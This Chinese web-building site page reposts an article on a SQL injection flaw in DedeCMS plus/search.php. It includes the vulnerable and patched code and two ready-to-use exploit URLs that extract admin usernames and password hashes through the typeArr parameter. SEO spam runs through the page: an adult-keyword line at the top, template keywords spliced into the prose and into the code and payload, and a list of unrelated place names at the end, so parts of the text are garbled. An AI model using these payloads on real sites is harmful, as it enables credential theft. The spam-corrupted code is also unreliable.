久久机这里只有精品,国产69精品一区二区亚洲孕妇,91精品国产综合久久婷婷香蕉,午夜久久久久久电影

最新活動:電腦PC端+手機端+微網(wǎng)站+自適應網(wǎng)頁多模板選擇-建站388元起價!!!
當前位置:主頁 > 網(wǎng)站建設 > dedecms plus/search.php注入漏洞修復及利用,dedecms

dedecms plus/search.php注入漏洞修復及利用,dedecms

時間:2023-07-21 10:07:21 閱讀: 文章分類: 網(wǎng)站建設 作者: 織夢網(wǎng)站員

導讀:dedecmsdedecmsdedecms的最近出的一高危漏洞,search.php注入漏洞;估計現(xiàn)在很多黑闊都非常愛dedecms,因為經(jīng)常有各種漏洞爆出.很多利用起來也都很簡單. 下面織夢文章模板dede網(wǎng)站模板。

織夢文章模板dede網(wǎng)站模板

dedecms的最近出的一高危漏洞,search.php注入漏洞;估計現(xiàn)在很多黑闊都非常愛dedecms,因為經(jīng)常有各種漏洞爆出.很多利用起來也都很簡單.

下面是漏洞的詳細利用細節(jié):

0×1:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 2 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0×2:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 1 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+informatio織夢后臺模板n_schema.tables+group+by+a)b)%23@`\'`+]=a

漏洞修復:

20130115常規(guī)安全更新include/arc.searchview.class.php, 搜索功能準確度優(yōu)化member/myfriend_group.php, 修復會員中心會員分組功能存在的安全隱患plus/search.php, 修復搜索功能存在的安全隱患

登錄DEDECMS后臺會有提示,更新即可。不過貌似官方?jīng)]有提供安全更新補丁的下載地址,找了半天沒找到~

漏洞分析:

存在漏洞的文件/plus/search.php

//引入欄目緩存并看關鍵字是否有相關欄目內容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as dede模板安裝$id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword);

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; //對ID沒做任何過濾 導致注入

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

修復dede5.7模板之后

//引入欄目緩存并看關鍵字是否有相關欄目內容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

//$keywordn = str_replace($typename, ‘ ‘, $keyword);

$keywordn = $keyword;

if($keyword != $keywordn)

{

$keyword = HtmlReplace($keywordn);//防XSS

$typeid = intval($id); //強制轉換為數(shù)字型

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

相關織夢文章模板dede網(wǎng)站模板。

關鍵詞標簽: 標簽 dedecms 漏洞

聲明: 本文由我的SEOUC技術文章主頁發(fā)布于:2023-07-21 ,文章dedecms plus/search.php注入漏洞修復及利用,dedecms主要講述漏洞,標簽,dedecms網(wǎng)站建設源碼以及服務器配置搭建相關技術文章。轉載請保留鏈接: http://www.bifwcx.com/article/web_33074.html

我的IDC 網(wǎng)站建設技術SEOUC.COM
專注網(wǎng)站建設,SEO優(yōu)化,小程序設計制作搭建開發(fā)定制網(wǎng)站等,數(shù)千家網(wǎng)站定制開發(fā)案例,網(wǎng)站推廣技術服務。
  • 5000+合作客服
  • 8年從業(yè)經(jīng)驗
  • 150+覆蓋行業(yè)
  • 最新熱門源碼技術文章

    主站蜘蛛池模板: 芒康县| 封丘县| 获嘉县| 江阴市| 孟州市| 二连浩特市| 米脂县| 嘉黎县| 通渭县| 拜城县| 香河县| 扬州市| 周至县| 百色市| 上饶市| 沙雅县| 临泉县| 西和县| 新郑市| 库尔勒市| 平乐县| 油尖旺区| 靖安县| 江达县| 卓尼县| 普洱| 塔河县| 京山县| 元朗区| 汉阴县| 佳木斯市| 翼城县| 德化县| 宁国市| 依兰县| 瑞安市| 尚志市| 银川市| 祁阳县| 邢台市| 稻城县|